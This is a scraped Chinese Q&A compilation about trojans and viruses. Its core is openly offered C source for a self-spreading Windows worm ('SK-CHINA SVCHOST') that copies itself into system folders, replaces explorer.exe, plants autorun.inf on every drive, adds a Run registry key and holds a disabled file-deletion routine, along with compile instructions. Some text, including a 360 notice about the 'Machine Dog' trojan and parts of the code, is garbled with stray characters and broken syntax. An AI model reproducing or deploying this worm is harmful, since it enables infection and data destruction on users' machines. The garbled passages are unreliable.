本文目录一览:
最新木马病毒下载
很多手机病毒会伪装为正常软件或者诱惑性名称,这类病毒一般会把自身隐藏在系统分区中,因此恢复出厂设置并不会删除病毒。一般的表现是手机自动下载其他推广软件、手机卡顿发热、出现有遮挡的广告等。甚至会倒是用户的账号被盗,银行卡被盗刷等风险。若怀疑手机中存在木马或者病毒,请尝试按照以下步骤进行清除:
请尝试安装一款安全软件(例如:手机管家等)。以手机管家为例,打开手机管家,点击主界面上的一键体检即可自动检测手机中存在的问题,并且给出处理建议,点击一键清除即可删除病毒程序。
若重启手机发现病毒依然存在或者提示无法删除,请先获取ROOT权限再进行深度查杀,获取ROOT可以使用电脑端的一键ROOT工具进行。
求病毒源代码
即使是小病毒也不是太好编的
比如用C语言做的小病毒……
功能:
1.在所有磁盘的根目录生成svchost.com和autorun.inf文件
2.生成病毒体:
c:\windows\wjview32.com
c:\windows\explorer.exe
c:\windows\system32\dllcache\explorer.exe
c:\windows\system\m *** ouse.dll
c:\windows\system32\cmdsys.sys
c:\windows\system32\mstsc32.exe
3.病毒体c:\windows\explorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在
explorer.exe前启动
4.修改注册表,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
设置自启动项(此操作不使用windowsAPI,防止用户对病毒体的发现,并实现并行执行)
5.生成的autorun.inf改变磁盘的打开方式,使其在windows2000以上的系统无论选择“打开”、“双击”、“资源管理器”等方式都无法打开分驱,而是以运行病毒的方式取而代之。
6.连锁能力,将病毒体相连,实现相连复制更新
7.使用进程不断调用进程,使得在任务管理里无法结束病毒进程
8.不断搜索磁盘,只要发现未感染病毒的一律感染,病毒删除后1秒内再建
9.生成垃圾文件(DESTORY_感染_任意数字)5个于C盘下
10.附带删除文件函数(为防止危害,本函数默认不执行)
本病毒到目前为止任何杀毒软件都无法将其查杀(07年的)
本病毒单机默认使用对机器无害(破坏代码已屏蔽)
提供病毒卸载程序(保存为X.BAT,双击运行即可卸载):
@echo off
echo SK-CHINA SVCHOST KILLER 2007.6
echo WRITE BY S.K
taskkill /im mstsc32.exe /f
del c:\windows\wjview32.com
del c:\windows\explorer.exe
del c:\windows\system32\dllcache\explorer.exe
del c:\windows\system\m *** ouse.dll
del c:\windows\system32\cmdsys.sys
del c:\windows\system32\mstsc32.exe
del c:\svchost.com
del c:\autorun.inf
del d:\svchost.com
del d:\autorun.inf
del e:\svchost.com
del e:\autorun.inf
del f:\svchost.com
del f:\autorun.inf
del g:\svchost.com
del g:\autorun.inf
del h:\svchost.com
del h:\autorun.inf
copy c:\windows\system\explorer.exe c:\windows\explorer.exe
copy c:\windows\system\explorer.exe c:\windows\system32\dllcache\explorer.exe
del c:\windows\system\explorer.exe
echo FINISH!
echo 如果本次清除后仍残留有病毒,请再次运行本程序
pause
--------------------------------------------------------------------
核心代码:(全部代码请从附件中下载,请用DEV-CPP运行其中的工程文件,编译后请将结果文件svchost.exe更名为svchost.com,否则本病毒无法发挥作用,请安心运行实验,恶意代码已屏蔽)
/*
SK-CHINA
SVCHOST virus WRITE BY S.K
Compiler:
DEV-CPP 4.9.9.2
*/
/* SVCHOST.C */
/* SVCHOST.EXE */
/* SVCHOST.COM */
#includestdio.h /*标准输入输出*/
#includestring.h /*字符串操作*/
#includestdlib.h /*其它函数*/
#includeprocess.h /*进程控制*/
#includedir.h /*目录函数*/
#define SVCHOST_NUM 6 /*关键位置病毒复制数量*/
#define RUBBISH_NUM 5 /*垃圾文件数量*/
#define REMOVE_NUM 5 /*删除文件数*/
/*====================================================================*/
/*
文件AUTORUN.INF内容:
1.自动运行SVCHOST.com
2.覆盖默认打开命令,使用病毒体作为新的打开方式
3.覆盖默认资源管理器命令,使病毒体作为新的命令方式
*/
char *autorun={"[AutoRun]\nopen=\"SVCHOST.com /s\"\nshell\\open=打开(O)
\nshell\\open\\Command=\"SVCHOST.com /s\"\nshell\\explore=资源管理器(X)
\nshell\\explore\\Command=\"SVCHOST.com /s\""};
/*=====================================================================*/
/*
添加注册表项:
1.自动运行生成病毒体C:\windows\wjview32.com
*/
char *regadd={"REGEDIT4\n\n
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\n\"wjview32
\"=\"C:\\\\windows\\\\wjview32.com /s\""};
/*=====================================================================*/
/*
函数:复制文件
复制源:infile
目的地:outfile
成功返回0,失败返回1
*/
int copy(char *infile,char *outfile)
{
FILE *input,*output;
char temp;
if(strcmp(infile,outfile)!=0 ((input=fopen(infile,"rb"))!=NULL) ((output=fopen
(outfile,"wb"))!=NULL))
{
while(!feof(input))
{
fread(temp,1,1,input);
fwrite(temp,1,1,output);
}
fclose(input);
fclose(output);
return 0;
}
else return 1;
}
/*=====================================================================*/
/*
函数:通过explorer自动运行
成功返回0,失败返回1,2
*/
int autorun_explorer()
{
FILE *input;
if((input=fopen("c:\\windows\\system\\explorer.exe","rb"))!=NULL)
{
fclose(input);
remove("c:\\windows\\$temp$");
remove("c:\\windows\\system32\\dllcache\\$temp$");
return 1;
}
copy("c:\\windows\\explorer.exe","c:\\windows\\system\\explorer.exe");
rename("c:\\windows\\explorer.exe","c:\\windows\\$temp$");
rename("c:\\windows\\system32\\dllcache\\explorer.exe","c:\\windows\\system32
\\dllcache\\$temp$");
if(copy("SVCHOST.com","c:\\windows\\explorer.exe")==0 copy
("SVCHOST.com","c:\\windows\\system32\\dllcache\\explorer.exe")==0)
return 0;
else
return 2;
}
/*=====================================================================*/
/*
函数:添加注册表项
成功返回0,失败返回1
*/
int add_reg()
{
FILE *output;
if((output=fopen("$$$$$","w"))!=NULL)
{
fprintf(output,regadd);
fclose(output);
spawnl(1,"c:\\windows\\regedit.exe"," /s $$$$$",NULL);
}
}
/*=====================================================================*/
/*
函数:复制病毒 + Autorun.inf自动运行
*/
void copy_virus()
{
int i,k;
FILE *input,*output;
char *files_svchost[SVCHOST_NUM]=
{"svchost.com","c:\\windows\\wjview32.com","c:\\windows\\system\\M *** OUSE.DLL","c:\\windows\\syste
m32\\cmdsys.sys","c:\\windows\\system32\\mstsc32.exe","c:\\windows\\explorer.exe"};
char temp[2][20]={"c:\\svchost.com","c:\\autorun.inf"};
for(i=0;iSVCHOST_NUM;i++)
{
if((input=fopen(files_svchost[i],"rb"))!=NULL)
{
fclose(input);
for(k=0;kSVCHOST_NUM;k++)
{
copy(files_svchost[i],files_svchost[k]);
}
i=SVCHOST_NUM;
}
}
for(i=0;iSVCHOST_NUM;i++)
{
if((input=fopen(files_svchost[i],"rb"))!=NULL)
{
fclose(input);
for(k=0;k24;k++)
{
copy(files_svchost[i],temp[0]);
if((output=fopen(temp[1],"w"))!=NULL)
{
fprintf(output,"%s",autorun);
fclose(output);
}
temp[0][0]++;
temp[1][0]++;
}
i=SVCHOST_NUM;
}
}
}
/*=====================================================================*/
/*
函数:制造垃圾文件
*/
void make_rubbish()
{
int i;
FILE *output;
srand(0);
for(i=0;iRUBBISH_NUM;i++)
{
int n;
char s[30];
n=rand();
sprintf(s,"C:\\DESTORY_感染_%d",n);
if((output=fopen(s,"w"))!=NULL)
{
fprintf(output,"%ld%s",n*n,s);
fclose(output);
}
}
}
/*=====================================================================*/
/*
函数:删除文件
*/
void remove_files()
{
long done;
int i;
struct _finddata_t ffblk;
char *remove_files[3]={"*.txt","*.doc","*.xls"};
for(i=0;i3;i++)
{
if(_findfirst(remove_files[i],ffblk)==-1) continue;
while(!done)
{
remove(ffblk.name);
_findnext(done,ffblk);
}
_findclose(done);
}
}
/*=====================================================================*/
/*
主程序
使用DEV-CPP 32位C工程 实现.C程序脱离命令行界面,于后台执行
*/
int main(int argc,char **argv)
{
int contral=0;
if(argc1)
if(strcmp(argv[1],"/s")==0)
goto next1;
autorun_explorer();
spawnl(1,"c:\\windows\\system\\explorer.exe",NULL);
next1:
add_reg();
copy_virus();
make_rubbish();
/* remove_files(); */
spawnl(1,"c:\\windows\\system32\\mstsc32.exe"," /s",NULL);
return 0;
}
其他的恐怕只能告诉你网址了
比如黑客联盟的
网站被嵌入木马病毒,从哪里着手才能找到源木马代码呢?
下载到本地。DW建立个站点。本地IIS测试,开启360等拦截嵌入木马,得到木马的地址。然后在DW里对这个站点进行搜索。那么就能把木马搜索出来了。
机器狗木马三代病毒源代码
机器狗木马三代是机器狗木马的最新变种,从五一假期开始处于爆发趋势,至今愈演愈烈,[b][color=red]截至目前已有百万电脑中招[/color][/b]。360安全中心再次紧急更新360顽固木马专杀大全,全面围剿机器狗木马三代。(360顽固木马专杀大全下载地址:[url=][color=#0044dd][/color][/url])KE|.C|(Z+^
QC|Y\(ZMXE
机器狗是一种危害极强的木马病毒下载器,它会给受害者的电脑下载大量的木马、病毒、恶意软件、插件等。[b][color=red]一旦中毒,受害者的电脑便随时可能感染任何木马病毒,这些木马病毒会疯狂地盗用用户的 *** 账号密码、游戏账号密码、网上银行卡号密码等用户信息,也会破坏操作系统,严重的会使系统彻底崩溃。[/color][/b]2f?*u4kZ
0ZQ2kA*RO ]+Q6RF 本次出现的新变种则更加猖狂,主要有如下行为:M5@q'@I-\\lq
3b@1@`(BY'Rf [b]1. 使杀毒软件失效并破坏系统[/b]
%i%Y:@$^^^D%a@
.szk*}? jV_ 感染更多系统文件,在安装有卡巴斯基的电脑里,能先使卡巴斯基失效,以便释放一个驱动。在这个驱动的作用下,机器狗新变种木马就能绕过所有的还原软件和自我保护以及开机免疫,进而为所欲为。.J/O1|Vq,W
4]z F{|W [b]2. 给电脑装上大量的病毒和木马[/b] Q.j `AG8c u
o}*_Kj9b4G
感染后的系统文件会自动后台访问木马网站,下载一个TXT文本文件,并根据文件里的配置下载相关木马。从这个角度上来讲,这个新变种的机器狗也承担了一部分的“木马运输”工作,成为其他木马的渠道,以便以此获利。
%o9QL_S\Z.G1H
"O7a!C2|;gfV [b]3. 破坏360保险箱的保护,盗取账号密码[/b],Qg P%[ se
C8s oVS Hs 部分新变种能特别针对360保险箱进行攻击,修改360保险箱中的关键文件,取消游戏保护功能,继而盗取账号密码。
Z [6hv?` x
7l%\*F^3wk@ S +X4Up0~lS Ie ^
nas`vw9rc/A
如果大家遇见以上症状,请下载机器狗专杀或者360专杀大全进行全面检测和查杀h~StE#q
0c!RhI.fO1fl+r
机器狗专杀下载地址:[url=][color=#0000ff][/color][/url][f!s0k2v EU'l
/{P#e^f)G 360专杀大全下载地址:[url=][color=#0000ff][/color][/url]
!G"Gr L2Y6A/a K%yi4o cDf
[b][color=red]注:下载机器狗专杀运行后,会为您的电脑增加对机器狗的免疫。增加免疫后,可以抵御大多数木马病毒。[/color][/b]%Y)N#V(NJIi
8m UMA R
或者及时到360百科([url=][color=#0000ff][/color][/url])求助,也可直接发邮件至 [email]fk@360safe.com[/email]进行反馈。
木马病毒代码下载?
远程控制木马的原代码:
木马基地:
ASP木马的原代码!: